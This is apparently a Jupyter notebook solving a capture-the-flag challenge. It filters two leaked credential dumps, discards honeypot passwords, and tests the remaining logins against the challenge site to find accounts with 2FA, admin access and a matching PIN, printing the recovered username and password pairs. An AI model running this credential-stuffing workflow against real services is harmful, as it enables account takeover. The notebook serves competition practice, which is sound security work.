In [1]:
import csv
import re
import requests

In [2]:
HOST = "challenges.challenge-ecw.eu"
PORT = "39099"

BASE = f"http://{HOST}:{PORT}/"

LOGIN_URL   = f"{BASE}controllers/db_controller.php?func=login"
PROFILE_URL = f"{BASE}controllers/authentication_redirect.php?page=profile"
ADMIN_URL   = f"{BASE}views/admin.php"
PIN_URL     = f"{BASE}controllers/db_controller.php?func=enterPin"

In [3]:
ACCOUNTS = []

with open("./dump-2024-08-20.csv") as file:
    csv_reader = csv.reader(file, delimiter=";")

    for row in csv_reader:
        ACCOUNTS.append(row)

print(len(ACCOUNTS))

884


In [4]:
def filter_accounts(foo):
    '''
    Keeps only the accounts for which foo is true
    '''
    res = []
    l = len(ACCOUNTS)
    for row in ACCOUNTS:
        if foo(row[0], row[1]):
            res.append(row)
    print(f"{l - len(res)} accounts were removed")
    return res

## Obviously fake accounts

In [5]:
def rm_fakes(_, password):
    return (re.match(".*[hH][oO0][nN][eE3][yY]", password) is None) and (
        re.match(".*[fF][aA@4][kK][eE3]", password) is None
    )

In [6]:
ACCOUNTS = filter_accounts(rm_fakes)

37 accounts were removed


## Accounts that can't login

In [7]:
def rm_no_login(username, password):
    response = requests.post(LOGIN_URL, data={"username": username, "password": password})
    return "Wrong username or password!" not in response.text

In [8]:
ACCOUNTS = filter_accounts(rm_no_login)

578 accounts were removed


## Accounts that don't have 2 factor auth

In [9]:
def rm_no_2fa(username, password):
    session = requests.Session()
    session.post(LOGIN_URL, data={"username": username, "password": password})
    response = session.get(PROFILE_URL)
    return "Enter Your 8-Digit PIN" in response.text

In [10]:
ACCOUNTS = filter_accounts(rm_no_2fa)

11 accounts were removed


## Accounts that don't have admin access

In [11]:
def rm_no_admin(username, password):
    session = requests.Session()
    session.post(LOGIN_URL, data={"username": username, "password": password})
    response = session.get(ADMIN_URL)
    return "Forbidden" not in response.text

In [12]:
ACCOUNTS = filter_accounts(rm_no_admin)

257 accounts were removed


In [13]:
print(ACCOUNTS)

[['admin-lilewis', 'CwDydHrVW@juR']]


# Filter the second dump

In [14]:
ACCOUNTS = []

with open("./dump-2024-08-27.csv") as file:
    csv_reader = csv.reader(file, delimiter=";")

    for row in csv_reader:
        ACCOUNTS.append(row)

In [15]:
OLD_ACCOUNTS = []

with open("./dump-2024-08-20.csv") as file:
    csv_reader = csv.reader(file, delimiter=";")

    for row in csv_reader:
        OLD_ACCOUNTS.append(row)

def rm_old(username, password):
    return [username, password] not in OLD_ACCOUNTS

In [16]:
ACCOUNTS = filter_accounts(rm_old)

884 accounts were removed


In [17]:
ACCOUNTS = filter_accounts(rm_fakes)

3 accounts were removed


In [18]:
ACCOUNTS = filter_accounts(rm_no_login)

18 accounts were removed


In [19]:
ACCOUNTS = filter_accounts(rm_no_2fa)

1 accounts were removed


In [20]:
ADMINS = filter_accounts(rm_no_admin)
print(ADMINS)

4 accounts were removed
[['admin-romason', 'vKfUMFwlMffDU'], ['admin-jidavis', 'fjbpfOZ@l0PnD']]


### Accounts with the correct PIN

In [21]:
PIN = [3, 5, 2, 6, 8, 7, 1, 3]

In [22]:
def rm_wrong_pin(username, password):
    session = requests.Session()
    session.post(LOGIN_URL, data={"username": username, "password": password})

    response = session.post(
        PIN_URL,
        data={
            "1": PIN[0],
            "2": PIN[1],
            "3": PIN[2],
            "4": PIN[3],
            "5": PIN[4],
            "6": PIN[5],
            "7": PIN[6],
            "8": PIN[7],
        },
    )

    return "Wrong pin!" not in response.text

In [23]:
TARGET = filter_accounts(rm_wrong_pin)

5 accounts were removed


In [24]:
print(TARGET)

[['jasmith', 'HIR*0dVS!MygZ']]
